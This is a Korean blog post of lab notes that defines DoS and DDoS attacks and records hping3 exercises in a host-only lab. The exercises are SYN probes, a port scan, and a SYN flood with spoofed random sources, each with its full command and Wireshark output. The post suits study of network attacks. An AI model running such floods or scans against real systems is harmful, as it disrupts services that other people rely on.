ABOUT ME

    -

    Today
    -
    Yesterday
    -
    Total
    -
    • Dos & DDos Attack
      카테고리 없음 2023. 3. 6. 11:17

      개요

      • DoS

           ; 서비스 거부 공격(-拒否 攻擊, 영어: denial-of-service attack, DoS attack)을 말한다.

       

            ; 시스템을 악의적으로 공격해 해당 시스템의 리소스를 부족하게 하여 원래 의도된 용도로 사용하지 못하게 하는 공격이다.

       

            ; 특정 서버에게 수많은 접속 시도를 해서 다른 이용자가 정상적인 서비스 이용을 못하게 하거나, 서버의 TCP 연결을 바닥내는 등의 공격등이 포함된다.

       

            ; 수단, 동기, 표적은 다양할 수 있지만, 보통 인터넷 사이트 또는 서비스의 기능을 일시적 또는 영구적으로 방해 및 중단을 초래한다.

       

            ; 통상적으로 DoS는 유명한 사이트 즉 은행, 신용카드 지불 게이트웨이(PG), 또는 심지어 루트 네임 서버(root name server)를 상대로 이루어진다.

       

            ; 2002년 10월 22일과 2007년 2월 6일의 DNS 루트 서버에 대한 DNS 백본 DDoS 공격은 인터넷 URL 주소 체계를 무력화시켜 인터넷 전체에 대한 공격이었다.

       

      • DDoS

      ; 분산 서비스 거부 공격(Distributed DoS) 또는 디도스(DDoS)는 여러 대의 공격자를 분산적으로 배치해 동시에 서비스 거부 공격을 하는 방법이다.

       

      ; 이는 IAB의 '정당한 인터넷 사용 정책'에 반하는 것으로 여겨지며 거의 모든 인터넷 서비스 공급자의 허용할 수 있는 사용 정책도 위반한다.

       

             ; 또한 개별 국가의 법률에도 저촉된다.

      4.2 hping3의 포트스캔을 이용한 DDoS Attack

      • 개요

      : 방화벽을 테스트하고 포트 스캔을 테스트하여 TCP/IP 스택을 테스트하고 가동 시간을 추출하는 기능

      : DDoS Attack시 필요한 포트를 추출한다.




      • 실습환경(Host-only)

         ; Kali(Attacker) :192.168.10.128 / C Class / 192.168.10.130 / 192.168.10.130

          ; CentOS(Victim)             :192.168.10.130 / C Class / x / x

          ; windows 10(zomping PC) :192.168.10.129 / C Class / 192.1687.10.130/192.168.10.130

       

      • 실습

      : 테스트 1. TCP Sync 패킷을 보내면(Request) ‘flags=SA(Sync/Ack)’ 로 응답(Response)이 온다.

      ; 명령

      -> hping3 -S www.samadal.com -p 80 -c 5

      가끔 RA로 뜨는 경우가 있는데 이는 dns서버에서 systemctl restart httpd를 안해줘서 그럼

      -> wireshark로 확인(tcp로 필터링해서 보면 된다.)

      -> 패킷 분석

      Source   Destination     Protocol Length Info

      192.168.10.130 192.168.10.128 TCP 60 80 → 2653 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460

      192.168.10.130 192.168.10.128 TCP 60 80 → 2652 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460

      192.168.10.130 192.168.10.128 TCP 60 80 → 2651 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460

      192.168.10.130 192.168.10.128 TCP 60 80 → 2650 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460

      192.168.10.130 192.168.10.128 TCP 60 80 → 2649 [SYN, ACK] Seq=0 Ack=1 

      Win=29200 Len=0 MSS=1460

       

      테스트2. 

      ; 명령 sudo hping3 --scan 1-1024 -S 192.168.10.130 (-S = TCP)

      ; 샥스핀으로 확인

      -> Destination 시스템으로 TCP Sync 패킷 전송(포트스캔)

      Source   Destination Protocol Length Info

      192.168.10.128 192.168.10.130 TCP 54 [TCP Port numbers reused] 1958 → 676 [SYN]

      192.168.10.128 192.168.10.130 TCP 54 [TCP Port numbers reused] 1958 → 677 [SYN]

      192.168.10.128 192.168.10.130 TCP 54 [TCP Port numbers reused] 1958 → 678 [SYN]

      192.168.10.128 192.168.10.130 TCP 54 [TCP Port numbers reused] 1958 → 679 [SYN] 

      -> 열려 있는 포트들의 TCP Sync 응답

      Source Destination Protocol Length Info

      192.168.10.128 192.168.10.130 TCP 54 1958 → 22 [SYN]

      192.168.10.128 192.168.10.130 TCP 54 1958 → 21 [SYN]

       

      192.168.10.128 192.168.10.130 TCP 54 1958 → 22 [SYN]

      192.168.10.130 192.168.10.128 TCP 60 22 → 1958 [SYN, ACK]

       

      192.168.10.128 192.168.10.130 TCP 54 1958 → 21 [SYN]

      192.168.10.130 192.168.10.128 TCP 60 21 → 1958 [RST, ACK]




      Kali의 임의의 포트(1958)에서 CentOS의 포트(21,22)로 TCP Sync를 전송 했을 때 TCP Flag(RST)가 전송

      열려있는 애들은 이름이랑 같이 섞여있는 걸 확인할 수 있다.

       

      : 테스트 3. 공격 대상 시스템에 무작위(Random)의 IP주소를 계속 보낸다.

      ; 명령 : hping3 --rand-source(무작위) 192.168.10.130(대상 IP) -p 1-1024(스캐닝 할 포트) -S(TCP Flag SYN) --flood(Flooding)

      이 명령을 kali에서 하면 뻑나니 조심히 사용(위험)

      tcpdump

       

    Designed by Tistory.

    티스토리툴바